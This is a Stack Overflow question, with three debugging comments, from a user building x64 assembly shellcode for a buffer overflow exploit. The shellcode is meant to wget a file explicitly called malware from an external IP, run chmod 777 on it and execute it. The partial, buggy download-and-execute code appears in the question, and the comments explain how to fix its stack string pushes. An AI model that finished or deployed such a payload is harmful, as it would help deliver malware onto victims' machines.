
The problem is based on linux/x64 asm wget+chmod+exec

I have some questions to ask. I am using pwntools for a buffer overflow attack, and I want to stuff the shellcode onto the stack for it to run. I tested using execve("/bin/sh") and I can get the shell successfully, but now I want it to download the malware from an external host, for example 192.168.255.136/mal. After downloading, give it execute permission with chmod 777 mal and finally execute it with ./mal

I tried to write a wget call to download the external file, but there is no request.

The wget asm I tried to write is as follows:

_start:
    xor eax, eax
    mov rax, 0x39          ; fork (syscall 57)
    syscall

    xor rbx, rbx
    cmp rax, rbx           ; rax == 0 in the child
    je child               ; child is the next label, so the parent falls through into it too

child:
    xor rax, rax
    push rax               ; NUL terminator for the URL string

    ; "192.168.255.136/mal" as 4-byte little-endian chunks; in 64-bit mode each
    ; push stores 8 bytes (imm32 sign-extended), not 4
    push 0x6c616d2f        ; "/mal"
    push 0x2f363331        ; "136/"
    push 0x2e353532        ; "255."
    push 0x2e383631        ; "168."
    push 0x2e323931        ; "192."
    mov rsi, rsp           ; rsi -> URL

    ; "/usr/bin/wget", same 4-byte chunking
    push 0x74              ; "t"
    push 0x6567772f        ; "/wge"
    push 0x6e69622f        ; "/bin"
    push 0x7273752f        ; "/usr"
    mov rdi, rsp           ; rdi -> path

    push rax               ; argv[2] = NULL
    push rsi               ; argv[1] = URL
    push rdi               ; argv[0] = path
    mov rsi, rsp           ; rsi -> argv

    mov eax, 0x3b          ; execve (syscall 59)
    xor rdx, rdx           ; envp = NULL
    syscall

This is my modification of it, made by referring to shell-storm's x86 download+chmod+exec, but it failed.

source : https://shell-storm.org/shellcode/files/shellcode-862.html

  • You know `push imm32` is an 8-byte push, right? The immediate is zero-extended to 64-bit. If that's supposed to be string data, there will be gaps of 4 `0` bytes between each 4-byte chunk, as you can see if you single-step with a debugger and examine memory. Probably you wanted `mov rsi, 0x6c616d2f2f363331` / `push rsi` and similar for the next 2 chunks, to push a total of 16 bytes of string data? Also, this is NASM syntax, you can write stuff like `mov rsi, 'hello wo'` instead of manually using the hex bit-patterns. – Peter Cordes May 25 '23 at 04:48
  • Also, `strace ./a.out` is another important debugging tool to trace what system calls you make, and decode the actual args you passed. – Peter Cordes May 25 '23 at 04:50
  • Near duplicates: [How many bytes does the push instruction push onto the stack when I don't specify the operand size?](https://stackoverflow.com/q/45127993) and [How to push a 64bit int in NASM?](https://stackoverflow.com/q/16917643) – Peter Cordes May 25 '23 at 04:55

0 Answers